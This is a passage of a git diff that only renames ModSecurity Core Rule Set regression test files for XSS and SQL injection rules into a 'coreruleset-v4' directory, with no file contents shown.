b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml similarity index 100% rename from 